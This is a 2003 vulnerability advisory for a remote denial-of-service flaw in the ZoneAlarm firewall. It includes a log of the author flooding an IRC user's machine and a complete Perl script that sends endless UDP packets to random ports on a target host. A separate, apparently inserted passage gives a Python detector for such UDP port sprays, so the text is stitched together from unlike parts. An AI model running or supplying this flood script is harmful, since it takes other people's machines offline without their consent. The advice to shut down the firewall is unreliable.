ZoneAlarm remote Denial Of Service exploit

2003-09-03T00:00:00
ID SECURITYVULNS:DOC:5044
Type securityvulns
Reporter Securityvulns
Modified 2003-09-03T00:00:00

Description

Overview :

ZoneAlarm is a firewall software package designed for Microsoft Windows operating systems. It blocks intrusion attempts, is trusted by millions, and has advanced privacy features such as protection against worms, Trojan horses, and spyware. ZoneAlarm is distributed and maintained by Zone Labs (http://www.zonelabs.com).

Details :

ZoneAlarm was found to have a serious vulnerability leading to a remote denial-of-service condition, caused by its failure to handle random UDP packets. If an attacker sends multiple UDP packets to multiple ports (0-65000), the machine will hang until the attacker stops flooding.

The following is a remote test done against ZoneAlarm version 3.7.202 running on Windows XP Home Edition.

On IRC, test1 joined, running ZoneAlarm version 3.7.202 with default installation:

* test1 (test@62.251.*.) has joined #Hackology

from a linux box :

[root@mail DoS]# ping 62.251.*.
PING 62.251..* (62.251..*) from ... : 56(84) bytes of data.

--- 62.251.*. ping statistics ---
7 packets transmitted, 0 received, 100% loss, time 6017ms

on irc

-> [test1] PING

[test1 PING reply]: 1secs

Host is firewalled and up

Now let's try to DoS:

--- ZoneAlarm Remote DoS Xploit
---
--- Discovered & Coded By _6mO_HaCk

[] DoSing 62.251.. ... wait 1 minute and then CTRL+C to stop

[root@mail DoS]

after 2 minutes

* test1 (test@62.251.*.) Quit (Ping timeout)

I have made the same test on ZoneAlarm Pro 4.0 Release running on Windows XP Professional and I've got the same result.

Exploit released : 02/09/03

Vulnerable Versions : ALL

Operating Systems : ALL Windows

Successfully Tested on :

ZoneAlarm version 3.7.202 / Windows XP Home Edition / Windows 98.

ZoneAlarm Pro 4.0 Release / Windows XP Professional

Vendor status : UNKNOWN

Solution : Shut down ZoneAlarm and wait for an update.
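A defender's view of the traffic pattern described under Details, as an added example that is not part of the original advisory: it flags a source that sends UDP to many distinct destination ports on one host within a short window. The record format, the function names, the sample data (RFC 5737 documentation addresses) and the thresholds are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

def make_sample():
    """Constructed records: (epoch_seconds, src_ip, dst_ip, proto, dst_port)."""
    recs = []
    # Benign: one client repeatedly talking to a single UDP port (DNS).
    for i in range(200):
        recs.append((1000.0 + i * 0.05, "192.0.2.10", "198.51.100.5", "udp", 53))
    # Flood-like: one source spraying a different UDP port with every packet.
    for i in range(600):
        port = 1 + (i * 109) % 65000
        recs.append((1002.0 + i * 0.01, "203.0.113.7", "198.51.100.5", "udp", port))
    return sorted(recs)

def detect_udp_port_spray(records, window=5.0, min_ports=100):
    """Return {(src, dst): first_alert_time} for each source that reaches
    min_ports distinct UDP destination ports on one host within window seconds.
    Records must be sorted by timestamp."""
    recent = defaultdict(deque)                     # (src, dst) -> (ts, port) in window
    counts = defaultdict(lambda: defaultdict(int))  # (src, dst) -> port -> packets in window
    alerts = {}
    for ts, src, dst, proto, port in records:
        if proto != "udp":
            continue
        key = (src, dst)
        q, c = recent[key], counts[key]
        q.append((ts, port))
        c[port] += 1
        # Drop packets that have aged out of the sliding window.
        while q and ts - q[0][0] > window:
            _, old_port = q.popleft()
            c[old_port] -= 1
            if c[old_port] == 0:
                del c[old_port]
        # Alert once per pair, on distinct ports rather than raw packet count,
        # so a busy single-port service (the DNS client above) does not trigger.
        if len(c) >= min_ports and key not in alerts:
            alerts[key] = ts
    return alerts

if __name__ == "__main__":
    for (src, dst), ts in detect_udp_port_spray(make_sample()).items():
        print(f"UDP port spray: {src} -> {dst}, threshold reached at t={ts:.2f}")
```

The same rule can be applied upstream of the protected host (border router or IDS) to rate-limit or drop the offending source before the traffic reaches the desktop firewall.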

The following is simple code written in Perl to demonstrate this. The code is clean, it won't eat your CPU, and it doesn't need to be run as root, but you still have to use it at your own risk and on your own machine, or remotely after you get permission.

Big thanx go to D|NOOO and frost for providing me windows boxes with zonealarm for testing

Greetz to ir7ioli, BlooDMASK Abderrahman@zone-h.org NRGY, Le_Ro| JT ghosted_ Securma, anasoft SySiPh, phrack, DeV|L0Ty, MajNouN |BiG-LuV| h4ckg1rl and all my ppl here in Chicago and in Morocco

Comments suggestions or additional info feel free to contact me at simo@benyoussef.org or _6mO_HaCk@linuxmail.org

#!/usr/bin/perl

use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0])) { &usage }

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve $target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
    $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}

sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}